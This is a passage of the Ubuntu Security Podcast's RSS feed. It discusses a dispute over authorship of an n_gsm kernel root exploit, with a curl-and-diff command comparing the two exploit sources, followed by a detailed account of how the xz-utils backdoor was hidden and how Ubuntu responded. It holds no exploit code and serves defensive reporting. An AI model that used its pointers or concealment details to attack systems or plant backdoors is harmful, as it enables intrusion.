<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="reports-of-a-new-local-root-privilege-escalation-exploit-against-linux-kernel--08-32">Reports of a new local root privilege escalation exploit against Linux kernel (08:32)</h3>
<ul>
<li><a href="https://github.com/YuriiCrimson/ExploitGMStr">https://github.com/YuriiCrimson/ExploitGMStr</a></li>
<li>Ukrainian hacker YuriiCrimson</li>
<li>Has generated a lot of interest since whilst there are always vulns / CVEs in
the kernel we don&rsquo;t always see full PoCs much anymore</li>
<li>Originally developed an exploit against the <code>n_gsm</code> driver in the 6.4 and and 6.5 kernels</li>
<li>Says they were contacted by another hacker <code>jmpeax</code> (Jammes) - who wanted to purchase the exploit</li>
<li>After selling it to them, seems they tried to pass it off as their own
<ul>
<li><a href="https://github.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit">https://github.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit</a></li>
<li><a href="https://jmpeax.dev/The-tale-of-a-GSM-Kernel-LPE.html">https://jmpeax.dev/The-tale-of-a-GSM-Kernel-LPE.html</a></li>
<li>commit timestamps of the purported copy by Jammes are all dated over 3 weeks ago</li>
<li>but the original is only is only 1 week ago</li>
<li>so on the surface would appear the other way around</li>
<li>however, Yurii posted a <a href="https://t.me/itcrowdua/1/203010">video</a> of their interaction with Jammes on Telegram
to try and prove their side</li>
<li>looking at repo metadata
<a href="https://api.github.com/repos/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit">https://api.github.com/repos/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit</a> shows
the so-called copy was created on 22nd March</li>
<li>whereas the Yurii&rsquo;s is 6th April - so would appear that perhaps Jammes is
the original author</li>
<li>also can compare the two exploits and see they are almost identical - but
Jammes has an extra target for the 6.5.0-26-generic kernel from mantic
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>diff -w &lt;<span style="color:#f92672">(</span>curl https://raw.githubusercontent.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit/main/main.c<span style="color:#f92672">)</span> &lt;<span style="color:#f92672">(</span>curl https://raw.githubusercontent.com/YuriiCrimson/ExploitGSM/main/ExploitGSM_6_5/main.c<span style="color:#f92672">)</span>
</span></span></code></pre></div></li>
<li>who the actual author is remains unclear (also I don&rsquo;t have telegram so
couldn&rsquo;t check the video)&hellip;</li>
</ul>
</li>
<li>Regarding the actual vulnerability - turns out there is at least 2 if not 3 in this module</li>
<li>Old CVE-2023-6546 - written up <a href="https://github.com/Nassim-Asrir/ZDI-24-020/">https://github.com/Nassim-Asrir/ZDI-24-020/</a>
<ul>
<li>Fixed in 6.5-rc7</li>
</ul>
</li>
<li>Yurii / Jammes</li>
<li>Additional exploit by Yurii apparently targeting 5.15-6.1 - also in <code>n_gsm</code></li>
<li>Mixed reports about this last exploit but <a href="https://marc.info/?i=CADW8OBuC4JhqZ1Aa-GSGsRRbEzR-yL=xzRmxT+UkG_h6KsX9-A@mail.gmail.com">report the one from
Yurii/Jammes does work even on the latest upstream kernel</a></li>
<li>Waiting on a fix from upstream to then integrate in Ubuntu kernels</li>
<li>Interesting these exploits all used the same basic info leak from xen via
<code>/sys/kernel/notes</code> which leaks the symbol of the <code>xen_startup</code> function and
allows to break KASLR</li>
<li>Reports this was <a href="https://twitter.com/andersonc0d3/status/1778379134583861583">known since at least 2020</a></li>
<li>Many eyes&hellip;?</li>
</ul>
<h3 id="ubuntu-24-dot-04-lts--noble-numbat--beta-released--14-01">Ubuntu 24.04 LTS (Noble Numbat) Beta released (14:01)</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2024-April/000300.html">https://lists.ubuntu.com/archives/ubuntu-announce/2024-April/000300.html</a></li>
<li><a href="https://discourse.ubuntu.com/t/noble-numbat-release-notes/">https://discourse.ubuntu.com/t/noble-numbat-release-notes/</a></li>
<li>Also releases for all the flavours
<ul>
<li>Edubuntu, Kubuntu, Lubuntu, Ubuntu Budgie, Ubuntu Cinnamon, UbuntuKylin,
Ubuntu MATE, Ubuntu Studio, Ubuntu Unity, Xubuntu</li>
</ul>
</li>
<li>Final release scheduled for 25th April (just under 2 weeks)</li>
</ul>
<h3 id="update-on-xz-utils--15-18">Update on xz-utils (15:18)</h3>
<ul>
<li>When we talked about xz-utils last week, didn&rsquo;t really talk much about the
main upstream developer Lasse Collin</li>
<li>Thought it could be interesting to dive into how they essentially got
compromised by this actor - but that is perhaps done better by others - go
listen to the latest episode of Between Two Nerds from Tom Uren and The Grugq
(<a href="https://risky.biz/BTN74/">https://risky.biz/BTN74/</a>) talking about the tradecraft used to infiltrate the
project and comparing this against the more traditional HUMINT elements</li>
<li>Lasse Collin&rsquo;s github account and the <a href="https://github.com/tukaani-project/xz">Github project for xz</a> was reinstated</li>
<li><a href="https://github.com/tukaani-project/xz/commit/e93e13c8b3bec925c56e0c0b675d8000a0f7f754">Backdoor removed</a></li>
<li>Great sense of humour:</li>
</ul>
<blockquote>
<ul>
<li>
<p>The executable payloads were embedded as binary blobs in
the test files. This was a blatant violation of the
Debian Free Software Guidelines.</p>
</li>
<li>
<p>On machines that see lots bots poking at the SSH port, the backdoor
noticeably increased CPU load, resulting in degraded user experience
and thus overwhelmingly negative user feedback.</p>
</li>
<li>
<p>The maintainer who added the backdoor has disappeared.</p>
</li>
<li>
<p>Backdoors are bad for security.</p>
</li>
</ul>
</blockquote>
<ul>
<li>Also <a href="https://github.com/tukaani-project/xz/commit/689ae2427342a2ea1206eb5ca08301baf410e7e0">removed</a> the <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC">ifunc</a> (indirect function) support - ostensibly used to allow a
developer to create multiple implementations of a given function and select
between then at runtime - in this case was for an optimised version of CRC
calculation - but abused by the backdoor to be able to hook into and replace
functions in the global symbol table before it gets made read-only by the
dynamic loader
<ul>
<li>Says this was not for security reasons but since it makes the code harder to
maintain but is clearly a good win for security</li>
</ul>
</li>
<li>Lasse still plans to make to write an article on the backdoor etc but is more
focused on cleaning up the upstream repo first - next version is likely to be
5.8.0</li>
<li>Watch this space&hellip;</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E225.mp3" length="19383151" type="audio/mpeg" /><itunes:duration>1182</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 224
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-224/</link>
          <pubDate>Fri, 05 Apr 2024 15:10:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a3a0e245be93a1eb2734eb1d0b38554a77b6ecfc23409b17b040e5595cefd0edd8fd0344e4ca3fc6688882e82f7475eab514aa561cf35b97af3c1dc93d4d0a10</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 224</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's been an absolutely manic week in the Linux security community as the news
  and reaction to the recent announcement of a backdoor in the xz-utils project
  was announced late last week, so we dive deep into this issue and discuss how it...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's been an absolutely manic week in the Linux security community as the news
  and reaction to the recent announcement of a backdoor in the xz-utils project
  was announced late last week, so we dive deep into this issue and discuss how it
  impacts Ubuntu and give some insights for what this means for the open source
  and Linux communities in the future.
  </itunes:summary>
        <description>  It's been an absolutely manic week in the Linux security community as the news
  and reaction to the recent announcement of a backdoor in the xz-utils project
  was announced late last week, so we dive deep into this issue and discuss how it
  impacts Ubuntu and give some insights for what this means for the open source
  and Linux communities in the future.
  </description>
        <googleplay:description>  It's been an absolutely manic week in the Linux security community as the news
  and reaction to the recent announcement of a backdoor in the xz-utils project
  was announced late last week, so we dive deep into this issue and discuss how it
  impacts Ubuntu and give some insights for what this means for the open source
  and Linux communities in the future.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s been an absolutely manic week in the Linux security community as the news
and reaction to the recent announcement of a backdoor in the xz-utils project
was announced late last week, so we dive deep into this issue and discuss how it
impacts Ubuntu and give some insights for what this means for the open source
and Linux communities in the future.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>20 unique CVEs addressed</p>
<h3 id="usn-6718-2-curl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6718-2">USN-6718-2</a>] curl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2398">CVE-2024-2398</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6719-1-util-linux-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6719-1">USN-6719-1</a>] util-linux vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28085">CVE-2024-28085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6686-5-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6686-5">USN-6686-5</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4134">CVE-2023-4134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6715-1-unixodbc-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6715-1">USN-6715-1</a>] unixODBC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1013">CVE-2024-1013</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6704-4-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6704-4">USN-6704-4</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1085">CVE-2024-1085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32247">CVE-2023-32247</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23000">CVE-2023-23000</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6707-4-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6707-4">USN-6707-4</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26599">CVE-2024-26599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1085">CVE-2024-1085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6720-1-cacti-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6720-1">USN-6720-1</a>] Cacti vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39361">CVE-2023-39361</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="xz-utils-backdoor-and-ubuntu">xz-utils backdoor and Ubuntu</h3>
<ul>
<li><a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">https://www.openwall.com/lists/oss-security/2024/03/29/4</a></li>
<li>Late last week, 28th / 29th March backdoor in liblzma from xz-utils was
disclosed to the open source community via oss-security mailing list - this
was in the recent 5.6.0/5.6.1 releases from late Feb/early March this year</li>
<li>initially the impact was not entirely clear - assumed initially that it may
impact only xz-utils and so only in handling of xz compressed data / files -
but even with that assumption that perhaps it could then infect anything that
got compressed/decompressed</li>
<li>within a few hours though became clear that the primary target was not
xz-utils/liblzma itself but openssh - and the affect was to provide a backdoor
into openssh that would allow the attacker to get remote access to any machine
running ssh server with this backdoor liblzma installed</li>
<li>To paint a picture - this was all unfolding on late Thursday / Friday of the
Easter break, so lots of folks were either EOD or on leave etc - and trying to
grapple with a threat that we knew could possibly impact the impedending 24.04
LTS release</li>
</ul>
<!-- raw HTML omitted -->
<ul>
<li>Good news:</li>
<li>TL;DR for Ubuntu, this version was only ever in the -proposed pocket for the
currently in-development 24.04 release - not in any other Ubuntu versions -
and was removed as soon as we became aware, so unless you are running the
devel release AND you had manually opted to install this version from the
-proposed pocket, you would not be affected - very lucky</li>
<li><a href="https://discourse.ubuntu.com/t/xz-liblzma-security-update/43714">https://discourse.ubuntu.com/t/xz-liblzma-security-update/43714</a></li>
<li>What do we know about this? A lot - there has been significant investigation
(and speculation) since it was announced, both at the social side of things
and the technical aspects of the backdoor itself</li>
<li>For the purpose of the podcast, we won&rsquo;t go too deep into either but will try
and cover the salient details</li>
<li>Regarding the inclusion of the backdoor itself - looks to have been a very
long and patient campaign by the attacker, who slowly gained the trust of the
upstream project over the last 2 years and likely pressured the maintainer via
sock-puppet accounts to then get themselves added as an additional maintainer</li>
<li>Since then they seemed to be quite a good maintainer themselves - diligently
adding new features and bug fixes etc over the past 2 years, but then suddenly
introduced the backdoor into the most recent 2 releases</li>
<li>The method of introducing the backdoor was also interesting, in that it
required 2 parts - the binary containing the backdoor and the code to get this
compiled into the liblzma library at build time
<ul>
<li>The binary was committed into the upstream git repo disguised as an xz
archive itself used as part of the test suite</li>
<li>The code to inject this into the build was NOT part of the git repo, but
instead was just in the tarball prepared by the maintainer for the official
release</li>
<li>And it used many levels of obfuscation to hide this backdoor within that
fake test xz archive</li>
</ul>
</li>
<li>So the attacker was not just patient but also very technically skilled - and
not just multiple levels of obfuscation in the build process but the backdoor
code itself contained many elements to try and make it harder to recognise and
reverse engineer, presumably to allow it to hide in plain sight
<ul>
<li>although as we will see, this runtime obfuscation within the backdoor binary
was what gave it away eventually</li>
</ul>
</li>
<li>It&rsquo;s often said that one of the advantages of Open Source is the huge
community, which is summarised as <a href="https://en.wikipedia.org/wiki/Linus%27s_law">Linus&rsquo; Law</a> - with enough eyeballs all bugs
are shallow - but sadly this wasn&rsquo;t proven out in this case</li>
<li>Backdoor was not
found by anyone doing review of the changes upstream or by the various distros
like Debian / Fedora / OpenSUSE / Arch or even Ubuntu when incorporating this
new version into their repos - but instead was found by Andres Freund, one of
the maintainers of PostgreSQL, when they were looking to benchmark some new
changes scheduled for the next PostgreSQL release</li>
<li>Luckily decided to use Debian unstable for this, and Debian had incorporated
this new version into unstable a few weeks ago, and wanted to get the
performance noise floor of the system as low as possible before doing
benchmarking of PostgreSQL - noticed large transient CPU spikes in sshd and
then eventually weird memory errors in sshd due to bugs in the initial version
of the backdoor</li>
<li>After a lot of painstaking work was able to determine that liblzma was the
culprit and appeared to contain some very strange code to hook into the
authentication process of sshd when it was launched via systemd</li>
<li>Was able to trace that back to the aforementioned manually prepared tarballs
of xz-utils on Github</li>
<li>The CPU spikes Andres observed were due to the use of things like a trie to
lookup symbol names at runtime, rather than directly encoding them in the
exploit binary, presumably to try and make reverse engineering of the binary
harder (since you can&rsquo;t just run <code>strings</code> on it and get any real sensible output)</li>
<li>Some excellent writeups have been done regarding both the technical aspects of
the backdoor itself, as well as the process taken by the attacker to
incorporate this into the xz-utils project - both from a community point of
view and a technical point of view</li>
<li>From a technical point of view, the impact of this backdoor was to allow an
attacker to get pre-authentication remote-code execution in sshd via a
specific private key when connecting to the server - NOBUS
<ul>
<li>Hooked into the RSA certificate validation process in sshd, looking for a
particular matching private key from the client - and if found would then
proceed to execute arbitrary commands specified by the client without
requiring usual authentication</li>
<li>By using this mechanism, nobody but the attacker can use the backdoor since
they don&rsquo;t have the matching private key - so the impact of the backdoor is
somewhat limited</li>
<li>BUT the fact they targeted such a widely used and deployed package across a
huge number of distros, means they essentially wanted a backdoor into any
Linux machine in the future that only they could use</li>
</ul>
</li>
<li>Interesting to try and speculate who the attacker could be (nation state?) and
what their intended purpose was especially given this wide reaching goal of
getting this into all the major Linux distros - but it would be just
speculation</li>
<li>So rather than speculate, for the purpose of this podcast episode, interesting
to look at the timeline as it concerned Ubuntu</li>
<li>The publishing history of the package is all visible in <a href="https://launchpad.net/ubuntu/+source/xz-utils/+publishinghistory">Launchpad</a></li>
<li>Packages in Ubuntu get inherited from Debian who also publish <a href="https://tracker.debian.org/pkg/xz-utils">history</a></li>
<li>Upstream published the first backdoored version 5.6.0 via GitHub tarball on 24th Feb 2024</li>
<li>Debian incorporated this into unstable on 26th Feb</li>
<li>On 27th Feb, the Ubuntu Archive Auto-Sync bot copied this version into noble-proposed</li>
<li>Due to the ongoing time_t transition, sat it noble-proposed for the next month</li>
<li>Security team heard whispers of the possible backdoor just hours before it was
publicly disclosed, and as soon as we heard of the possible backdoor, and
realised that it only affected the version in-development noble-proposed we
quickly notified the Archive Admin team who then deleted it from
noble-proposed on 29th March, neutralising the main threat</li>
<li>Most important thing to know for Ubuntu, we have taken a very conservative
approach - not only have we removed this version from noble-proposed as soon
as we became aware, we are then rebuilding every binary package that got built
since that compromised version was in noble-proposed originally - out of an
abundance of caution - we don&rsquo;t have any information that says this backdoor
was doing anything other than what the various writeups have found so far, BUT
we also can&rsquo;t be certain that it didn&rsquo;t have other functionality either - so
being very cautious and rebuilding everything that was itself built since 27th
Feb</li>
<li>As such, delayed the development of 24.04 so beta release is <a href="https://discourse.ubuntu.com/t/xz-liblzma-security-update-post-2/43801">slipping by one week</a></li>
<li>One of the most interesting parts is the sheer luck that this was found - not
by security researchers or maintainers but by a developer from Microsoft who
happened to be looking for the right things at the right time and decided to
be curious</li>
<li>Also for Ubuntu, luck that the <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">time_t transition</a> in Debian/Ubuntu caused many
packages to be stuck in noble-proposed and not in the release pocket, else
many Ubuntu users and developers would have been impacted if this had migrated
to the noble release pocket</li>
<li>Also interesting that the attacker appears to have had quite a good grasp on
OSS development practices and was quite persistent in trying to get this
incorporated into distros - even <a href="https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417">urging</a> for this new version to be synced to
Ubuntu so that it would land in the upcoming noble release as recently as
Thursday last week, just hours before the public disclosure
<ul>
<li>Not only could they do all the original social engineering work upstream,
and technical work to develop and hide the backdoor, but could then
interface with distros via their established practices to try and get them
to incorporate their new backdoored version faster than they may have
otherwise</li>
</ul>
</li>
<li>Huge amount of work has been done to detail both the <a href="https://research.swtch.com/xz-timeline">timeline</a> of the attack as
well as the technical details of both the <a href="https://research.swtch.com/xz-script">code used to incorporate the
backdoored code</a> into the final liblzma binary during the build process, as
well as the details of the <a href="https://github.com/amlweems/xzbot">backdoor itself and how it operates at runtime</a></li>
<li>In the end highlights both the challenges and strengths of OSS - lots of OSS
projects have long dependency chains - in this case openssh when integrated
with libsystemd which in turn used liblzma - and it is unclear who the
maintainers and authors are or what procedures are in place for vetting and
transferring ownership of OSS projects - all present significant challenges
for OSS</li>
<li>However, significant strength of OSS is the visibility and ability for anyone
to get involved, which is what we saw in the aftermath - despite all the
advanced obfuscation techniques employed was able to be analysed in a matter
of days by the community working together - and to analyse it in a huge amount
of depth and in such an open way that it leaves little room for questioning
the validity of the assessment - anyone can double check the work and come to
the same conclusions</li>
<li>This isn&rsquo;t the first software supply chain attack and likely isn&rsquo;t even the
first against an OSS project but it is a wake-up call to the OSS and Linux
ecosystem</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E224.mp3" length="28604344" type="audio/mpeg" /><itunes:duration>1729</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 223
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-223/</link>
          <pubDate>Fri, 22 Mar 2024 16:44:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>50edf2179cdf046568b40430dd07484f04a91601133004d7335a7266efb0853c28ca7a092de4e490194e54f4a51b4a4ba6c980826dfd4973a84f3f9faaea03d3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 223</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own
  Vancouver 2024, plus news of malicious themes in the KDE Store and we cover
  security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and
  more....
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own
  Vancouver 2024, plus news of malicious themes in the KDE Store and we cover
  security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and
  more.
  </itunes:summary>
        <description>  This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own
  Vancouver 2024, plus news of malicious themes in the KDE Store and we cover
  security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and
  more.
  </description>
        <googleplay:description>  This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own
  Vancouver 2024, plus news of malicious themes in the KDE Store and we cover
  security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own
Vancouver 2024, plus news of malicious themes in the KDE Store and we cover
security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>61 unique CVEs addressed</p>
<h3 id="usn-6681-3-linux-kernel-vulnerabilities--00-54">[<a href="https://ubuntu.com/security/notices/USN-6681-3">USN-6681-3</a>] Linux kernel vulnerabilities (00:54)</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - IBM, Oracle</li>
<li>UAF due to a race-condition in netfilter - underflow a reference counter -&gt;
UAF</li>
</ul>
<h3 id="usn-6686-2-linux-kernel-vulnerabilities--01-42">[<a href="https://ubuntu.com/security/notices/USN-6686-2">USN-6686-2</a>] Linux kernel vulnerabilities (01:42)</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4134">CVE-2023-4134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - Raspi, Lowlatency</li>
</ul>
<h3 id="usn-6699-1-linux-kernel-vulnerabilities--01-52">[<a href="https://ubuntu.com/security/notices/USN-6699-1">USN-6699-1</a>] Linux kernel vulnerabilities (01:52)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13 - generic, lowlatency, server, virtual</li>
<li>KVM mishandling of control registers for nested guest VMs
<ul>
<li><a href="/episode-197/#usn-6123-1-linux-kernel--oem--vulnerabilities--06-48">[USN-6123-1] Linux kernel (OEM) vulnerabilities from Episode 197</a></li>
</ul>
</li>
<li>UAF in Quick Fair Queuing network packet scheduler
<ul>
<li>Local privesc, reported to Google&rsquo;s kCTF</li>
</ul>
</li>
</ul>
<h3 id="usn-6700-1-linux-kernel-vulnerabilities--02-40">[<a href="https://ubuntu.com/security/notices/USN-6700-1">USN-6700-1</a>] Linux kernel vulnerabilities (02:40)</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0775">CVE-2024-0775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39197">CVE-2023-39197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34256">CVE-2023-34256</a> <!-- raw HTML omitted --></li>
